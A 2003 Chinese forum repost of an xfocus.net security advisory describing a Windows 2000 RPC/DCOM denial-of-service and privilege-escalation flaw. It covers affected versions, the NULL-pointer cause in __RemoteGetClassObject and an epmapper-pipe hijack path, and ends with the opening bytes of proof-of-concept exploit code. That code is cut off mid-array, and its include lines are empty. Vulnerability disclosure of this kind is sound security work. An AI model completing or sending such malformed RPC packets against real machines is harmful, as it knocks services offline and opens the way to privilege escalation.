网友caoz发表于Donews：03年07月24日 14:49

　　网友caoz的转载声明

　　xfocus.net (安全焦点) 是非盈利性民间安全组织，骨干成员来自于各大专业安全公司，代表中国民间安全研究最高技术水平。

　　这次该组织独立发现微软严重安全漏洞，已经递交给微软公司，但是目前尚未得到任何正面回复，该风险对于基于win2000个人桌面电脑，网站均有严重的杀伤性。在一些安全专家的内部测试中已经得到有效证实，caoz也有亲眼见证。

　　原文如下：

　　MS WINDOWS 2000 RPC拒绝服务与本地权限提升漏洞

　　发布时间：2003-07-21

　　更新时间：2003-07-23

　　严重程度：高

　　威胁程度：远程拒绝服务

　　错误类型：输入验证错误

　　利用方式：客户机模式

　　受影响系统

　　windows 2000 sp 3

　　windows 2000 sp 4

　　windows 2000 sp 4+ms03-026

　　未影响系统

　　windows xp

　　windows 2003

　　详细描述

　　WINDOWS的RPC服务（RPCSS）存在漏洞，当发送一个畸形包的时候，会导致RPC服务无提示的崩溃掉。由于RPC服务是一个特殊的系统服务，许多应用和服务程序都依赖于他，因为可以造成这些程序与服务的拒绝服务。同时可以通过劫持epmapper管道和135端口的方法来提升权限和获取敏感信息。

　　技术分析

　　问题主要发生在RPC服务为DCOM服务提供__RemoteGetClassObject接口上，当传送一个特定包导致解析一个结构的指针参数为NULL的时候， __RemotoGetClassObject 未对此结构指针参数有有效性检查，在后续中就直接引用了此地址（此时为0）做读写操作，这样就导致了内存访问违例，RPC服务进程崩溃。

　　危害

　　攻击之后，许多基于RPC的应用无法使用，如使用网络与拨号连接拨号，配置本地连接等，一些基于RPC，DCOM的服务与应用将无法正常运行。

　　由于RPC服务是MS WINDOWS中一个重要的服务，他开放的135端口同时用于DCOM的认证，epmapper管道用于RPC端点的影射，并默认为系统信任，如果一个攻击者能够以低权限在被攻击机器上运行一个程序，在RPC服务崩溃以后，就可以通过劫持epmapper管道和135端口的方法来提升权限或获得DCOM客户端认证的信息。

　　测试代码

　　#include

　　#include

　　#include

　　#include

　　#include

　　#include

　　unsigned char bindstr[]={

　　0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

　　0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

　　0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, [未结束]